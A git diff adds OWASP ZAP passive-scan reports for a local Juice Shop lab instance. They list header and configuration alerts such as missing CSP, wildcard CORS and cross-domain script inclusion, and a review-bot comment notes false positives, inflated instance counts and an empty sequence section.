+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
+
+
+
+ Other Info
+ No links have been found while there are scripts, which is an indication that this is a modern web application.
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:365:14
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
+
+
+
+ Other Info
+ No links have been found while there are scripts, which is an indication that this is a modern web application.
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:376:14
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
+
+
+
+ Other Info
+ No links have been found while there are scripts, which is an indication that this is a modern web application.
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:421:3
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
+
+
+
+ Other Info
+ No links have been found while there are scripts, which is an indication that this is a modern web application.
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/serve-index/index.js:145:39
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
+
+
+
+ Other Info
+ No links have been found while there are scripts, which is an indication that this is a modern web application.
+
+
+
+ URL
+ http://localhost:3000/sitemap.xml
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
+
+
+
+ Other Info
+ No links have been found while there are scripts, which is an indication that this is a modern web application.
+
+
+ Instances
+
+
+ 11
+
+
+
+ Solution
+
+
+
+
+ Reference
+
+
+
+ CWE Id
+
+
+
+ WASC Id
+
+
+
+ Plugin Id
+ 10109
+
+
+
+
+
+
+
+
+ Non-Storable Content
+
+
+ Description
+
+
+
+
+
+
+
+
+
+ URL
+ http://localhost:3000/ftp
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ authorization:
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/ftp/coupons_2013.md.bak
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ authorization:
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/ftp/package-lock.json.bak
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ authorization:
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/robots.txt
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ authorization:
+
+
+
+ Other Info
+
+
+
+ Instances
+
+
+ 4
+
+
+
+ Solution
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Reference
+
+ https://datatracker.ietf.org/doc/html/rfc7234
+
+
+
+ https://datatracker.ietf.org/doc/html/rfc7231
+
+
+ https://www.w3.org/Protocols/rfc2616/rfc2616-sec13.html
+
+
+
+ CWE Id
+ 524
+
+
+ WASC Id
+ 13
+
+
+ Plugin Id
+ 10049
+
+
+
+
+
+
+
+
+
+
+
+
+ Storable but Non-Cacheable Content
+
+
+ Description
+
+
+
+
+
+
+
+
+
+ URL
+ http://localhost:3000
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ max-age=0
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ max-age=0
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/ftp/legal.md
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ max-age=0
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/build/routes/assets/public/favicon_js.ico
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ max-age=0
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/polyfills.js
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ max-age=0
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/sitemap.xml
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ max-age=0
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/styles.css
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ max-age=0
+
+
+
+ Other Info
+
+
+
+ Instances
+
+
+ 7
+
+
+
+ Solution
+
+
+
+ Reference
+
+ https://datatracker.ietf.org/doc/html/rfc7234
+
+
+
+ https://datatracker.ietf.org/doc/html/rfc7231
+
+
+ https://www.w3.org/Protocols/rfc2616/rfc2616-sec13.html
+
+
+
+ CWE Id
+ 524
+
+
+ WASC Id
+ 13
+
+
+ Plugin Id
+ 10049
+ Sequence Details
+ With the associated active scan results.
+
+
+
+
+
+
+
+
+
+
+
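Review bot: the Timestamp Disclosure - Unix instances in this hunk (sixteen hits such as 1650485437 and 2038834951 in http://localhost:3000/styles.css and /sitemap.xml) are bare integers inside a stylesheet and a sitemap rather than HTTP-layer timestamps, and the report is committed without triage; mark them as false positives or record the triage in the lab notes so the Low count is not read at face value. The instance counts are also inflated by spidered stack-trace strings: URLs such as http://localhost:3000/juice-shop/build/routes/fileServer.js:43:13 and http://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:328:13 are error-page stack frames the crawler followed as links, so each header finding is repeated once per frame (Instances 10 and 11 above); the more interesting point is the stack trace and file path disclosure from the error handler itself, which is not called out in this part of the report. Lastly, the hunk ends with "Sequence Details" / "With the associated active scan results." followed only by blank lines, so either the sequence section is empty because no active scan was run or the report is truncated; say which in the commit message or lab README, ideally together with the ZAP command and options used so the scan can be reproduced.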
diff --git a/labs/lab5/zap/report-noauth.html b/labs/lab5/zap/report-noauth.html
new file mode 100644
index 00000000..885d06ba
--- /dev/null
+++ b/labs/lab5/zap/report-noauth.html
@@ -0,0 +1,5489 @@
+
+
+
+
+
+
+
+
+
+
+
+ ZAP Scanning Report
+
+
+ Site: http://localhost:3000
+
+
+
+
+ Generated on Mon, 13 Apr 2026 08:58:22
+
+
+
+ ZAP Version: 2.16.1
+
+
+
+ ZAP by Checkmarx
+
+
+
+ Summary of Alerts
+
+
+
+
+
+
+
+
+
+ Risk Level
+ Number of Alerts
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Summary of Sequences
+ Alerts
+
+
+
+
+
+
+
+
+ Name
+ Risk Level
+ Number of Instances
+
+
+ Content Security Policy (CSP) Header Not Set
+ Medium
+
+
+ 22
+
+
+
+ Cross-Domain Misconfiguration
+ Medium
+
+
+ 8
+
+
+
+ Cross-Domain JavaScript Source File Inclusion
+ Low
+
+
+ 18
+
+
+
+ Dangerous JS Functions
+ Low
+
+
+ 2
+
+
+
+ Deprecated Feature Policy Header Set
+ Low
+
+
+ 11
+
+
+
+ Insufficient Site Isolation Against Spectre Vulnerability
+ Low
+
+
+ 24
+
+
+
+ Timestamp Disclosure - Unix
+ Low
+
+
+ 16
+
+
+
+ ZAP is Out of Date
+ Low
+
+
+ 1
+
+
+
+ Information Disclosure - Suspicious Comments
+ Informational
+
+
+ 2
+
+
+
+ Modern Web Application
+ Informational
+
+
+ 14
+
+
+
+ Non-Storable Content
+ Informational
+
+
+ 3
+
+
+
+ Storable and Cacheable Content
+ Informational
+
+
+ 1
+
+
+
+ Storable but Non-Cacheable Content
+ Informational
+
+
+ 11
+
+ Alert Detail
+
+
+
+
+
+
+
+
+
+ Content Security Policy (CSP) Header Not Set
+
+
+ Description
+
+
+
+
+
+
+
+
+
+ URL
+ http://localhost:3000
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/ftp
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/ftp/coupons_2013.md.bak
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/ftp/eastere.gg
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/ftp/encrypt.pyc
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/ftp/package-lock.json.bak
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/ftp/package.json.bak
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/ftp/suspicious_errors.yml
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/build/routes/assets/public/favicon_js.ico
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/build/routes/styles.css
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/express/lib/router/assets/public/favicon_js.ico
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/express/lib/router/assets/public/styles.css
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:286:9
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:376:14
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/express/lib/router/layer.js:95:5
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/express/lib/router/runtime.js
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/express/lib/router/styles.css
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/express/lib/router/vendor.js
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/serve-index/assets/public/assets/public/favicon_js.ico
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/serve-index/styles.css
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/sitemap.xml
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+ Instances
+
+
+ 22
+
+
+
+ Solution
+
+
+
+
+ Reference
+
+ https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CSP
+
+
+
+ https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html
+
+
+ https://www.w3.org/TR/CSP/
+
+
+ https://w3c.github.io/webappsec-csp/
+
+
+ https://web.dev/articles/csp
+
+
+ https://caniuse.com/#feat=contentsecuritypolicy
+
+
+ https://content-security-policy.com/
+
+
+
+ CWE Id
+ 693
+
+
+ WASC Id
+ 15
+
+
+ Plugin Id
+ 10038
+
+
+
+
+
+
+
+
+ Cross-Domain Misconfiguration
+
+
+ Description
+
+
+
+
+
+
+
+
+
+ URL
+ http://localhost:3000
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ Access-Control-Allow-Origin: *
+
+
+
+ Other Info
+ The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
+
+
+
+ URL
+ http://localhost:3000/ftp/eastere.gg
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ Access-Control-Allow-Origin: *
+
+
+
+ Other Info
+ The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
+
+
+
+ URL
+ http://localhost:3000/ftp/incident-support.kdbx
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ Access-Control-Allow-Origin: *
+
+
+
+ Other Info
+ The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
+
+
+
+ URL
+ http://localhost:3000/main.js
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ Access-Control-Allow-Origin: *
+
+
+
+ Other Info
+ The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
+
+
+
+ URL
+ http://localhost:3000/runtime.js
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ Access-Control-Allow-Origin: *
+
+
+
+ Other Info
+ The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
+
+
+
+ URL
+ http://localhost:3000/sitemap.xml
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ Access-Control-Allow-Origin: *
+
+
+
+ Other Info
+ The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
+
+
+
+ URL
+ http://localhost:3000/styles.css
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ Access-Control-Allow-Origin: *
+
+
+
+ Other Info
+ The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
+
+
+
+ URL
+ http://localhost:3000/vendor.js
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ Access-Control-Allow-Origin: *
+
+
+
+ Other Info
+ The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
+
+
+ Instances
+
+
+ 8
+
+
+
+ Solution
+
+
+
+
+
+
+ Reference
+
+ https://vulncat.fortify.com/en/detail?category=HTML5&subcategory=Overly%20Permissive%20CORS%20Policy
+
+
+
+
+ CWE Id
+ 264
+
+
+ WASC Id
+ 14
+
+
+ Plugin Id
+ 10098
+
+
+
+
+
+
+
+
+ Cross-Domain JavaScript Source File Inclusion
+
+
+ Description
+
+
+
+
+
+
+
+
+
+ URL
+ http://localhost:3000
+
+
+ Method
+ GET
+
+
+ Parameter
+ //cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000
+
+
+ Method
+ GET
+
+
+ Parameter
+ //cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/build/routes/fileServer.js:43:13
+
+
+ Method
+ GET
+
+
+ Parameter
+ //cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/build/routes/fileServer.js:43:13
+
+
+ Method
+ GET
+
+
+ Parameter
+ //cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/build/routes/styles.css
+
+
+ Method
+ GET
+
+
+ Parameter
+ //cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/build/routes/styles.css
+
+
+ Method
+ GET
+
+
+ Parameter
+ //cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/express/lib/router/assets/public/styles.css
+
+
+ Method
+ GET
+
+
+ Parameter
+ //cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/express/lib/router/assets/public/styles.css
+
+
+ Method
+ GET
+
+
+ Parameter
+ //cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/express/lib/router/runtime.js
+
+
+ Method
+ GET
+
+
+ Parameter
+ //cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/express/lib/router/runtime.js
+
+
+ Method
+ GET
+
+
+ Parameter
+ //cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/express/lib/router/styles.css
+
+
+ Method
+ GET
+
+
+ Parameter
+ //cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/express/lib/router/styles.css
+
+
+ Method
+ GET
+
+
+ Parameter
+ //cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/express/lib/router/vendor.js
+
+
+ Method
+ GET
+
+
+ Parameter
+ //cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/express/lib/router/vendor.js
+
+
+ Method
+ GET
+
+
+ Parameter
+ //cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/serve-index/styles.css
+
+
+ Method
+ GET
+
+
+ Parameter
+ //cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/serve-index/styles.css
+
+
+ Method
+ GET
+
+
+ Parameter
+ //cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/sitemap.xml
+
+
+ Method
+ GET
+
+
+ Parameter
+ //cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/sitemap.xml
+
+
+ Method
+ GET
+
+
+ Parameter
+ //cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
+
+
+
+ Other Info
+
+
+
+ Instances
+
+
+ 18
+
+
+
+ Solution
+
+
+
+
+ Reference
+
+
+
+ CWE Id
+ 829
+
+
+ WASC Id
+ 15
+
+
+ Plugin Id
+ 10017
+
+
+
+
+
+
+
+
+ Dangerous JS Functions
+
+
+ Description
+
+
+
+
+
+
+
+
+
+ URL
+ http://localhost:3000/main.js
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ bypassSecurityTrustHtml(
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/vendor.js
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ bypassSecurityTrustHtml(
+
+
+
+ Other Info
+
+
+
+ Instances
+
+
+ 2
+
+
+
+ Solution
+
+
+
+
+ Reference
+
+ https://v17.angular.io/guide/security
+
+
+
+
+ CWE Id
+ 749
+
+
+ WASC Id
+
+
+
+ Plugin Id
+ 10110
+
+
+
+
+
+
+
+
+ Deprecated Feature Policy Header Set
+
+
+ Description
+
+
+
+
+
+
+
+
+
+ URL
+ http://localhost:3000
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ Feature-Policy
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/ftp/coupons_2013.md.bak
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ Feature-Policy
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/ftp/eastere.gg
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ Feature-Policy
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/ftp/encrypt.pyc
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ Feature-Policy
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/ftp/package-lock.json.bak
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ Feature-Policy
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/ftp/suspicious_errors.yml
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ Feature-Policy
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/main.js
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ Feature-Policy
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/polyfills.js
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ Feature-Policy
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/runtime.js
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ Feature-Policy
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/sitemap.xml
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ Feature-Policy
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/vendor.js
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ Feature-Policy
+
+
+
+ Other Info
+
+
+
+ Instances
+
+
+ 11
+
+
+
+ Solution
+
+
+
+
+ Reference
+
+ https://developer.mozilla.org/en-US/docs/Web/HTTP/Reference/Headers/Permissions-Policy
+
+
+
+ https://scotthelme.co.uk/goodbye-feature-policy-and-hello-permissions-policy/
+
+
+
+ CWE Id
+ 16
+
+
+ WASC Id
+ 15
+
+
+ Plugin Id
+ 10063
+
+
+
+
+
+
+
+
+ Insufficient Site Isolation Against Spectre Vulnerability
+
+
+ Description
+
+
+
+
+
+
+
+
+
+ URL
+ http://localhost:3000
+
+
+ Method
+ GET
+
+
+ Parameter
+ Cross-Origin-Embedder-Policy
+
+
+ Attack
+
+
